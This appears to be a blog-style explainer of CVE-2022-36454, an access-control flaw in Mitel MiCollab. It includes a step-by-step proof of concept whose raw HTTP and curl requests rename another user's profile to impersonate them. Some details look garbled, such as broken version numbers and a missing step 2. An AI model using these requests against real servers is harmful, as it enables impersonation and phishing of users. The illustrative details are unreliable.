CVE-2022-36454 - Impersonation Vulnerability in Mitel MiCollab Up to 9.5..101—Exploiting Profile Parameter Manipulation

A critical vulnerability, CVE-2022-36454, has been discovered in the MiCollab Client API of Mitel MiCollab, affecting versions up to 9.5..101. This weakness allows authenticated users to modify profile attributes without proper authorization checks. In simple terms: a logged-in user can change profile parameters such as their display name and potentially impersonate other users. In this post, I’ll explain how this bug works, demonstrate a sample exploit, and provide further resources.

How the Vulnerability Works

The MiCollab Client API is supposed to prevent users from accessing or changing other people's data. However, due to weak access control (basically, missing permission checks!), a logged-in user can send API requests to modify not just their own info, but any user’s profile parameters if they know the target’s user ID.

This happens because the backend API checks if the request comes from an authenticated user but does not verify whether the user is updating their OWN profile or someone else’s. It's a classic case of *Insecure Direct Object Reference* (IDOR).

1. Get Your User Token

Log in to your MiCollab web interface. Open the browser’s developer tools to capture your session token or cookie for the API.

You might find this by browsing the app’s user directory or via endpoints like

GET /uapi/user

Suppose you get a JSON like

[
  {
    "id": "1023",
    "name": "Alice Smith"
  },
  {
    "id": "1055",
    "name": "Bob Jones"
  }
]

3. Craft the Malicious Request

With the victim's ID (say, 1055), you can send a PATCH or POST request targeting that user. For example:

POST /uapi/users/1055
Authorization: Bearer <your-session-token>
Content-Type: application/json

{
  "name": "Hacker Joe"
}

Or in curl

curl -X POST \
  https://<mi-collab-server>/uapi/users/1055 \
  -H "Authorization: Bearer <your-session-token>" \
  -H "Content-Type: application/json" \
  -d '{"name":"Hacker Joe"}'

4. Result: Impersonation

If the API is vulnerable, Bob Jones’s profile will now read “Hacker Joe”—even though you’re not Bob. In chat or directories, people now see you as him.

Social Engineering: The attacker can now send malicious or misleading messages as another user.

- Confusion and Trust Issues: Users may trust the impersonated messages, leading to data leaks or further phishing.

Original Advisory:

NVD - CVE-2022-36454

Mitel Advisory:

Mitel Security Bulletin 22-0017

Patch:

Mitel MiCollab 9.6. or later (update required)

Closing Thoughts

CVE-2022-36454 is a classic but very dangerous access control weakness. As you’ve seen above, poor authorization checks can let attackers do things that should never be allowed—like making one user look like another. Always keep your systems updated, and never trust user input when it comes to sensitive objects (like user profiles)!


*Stay safe & patch your systems! For more, check out the above advisories and keep an eye out for these simple but devastating bugs.*

Timeline

Published on: 10/25/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:21:00 UTC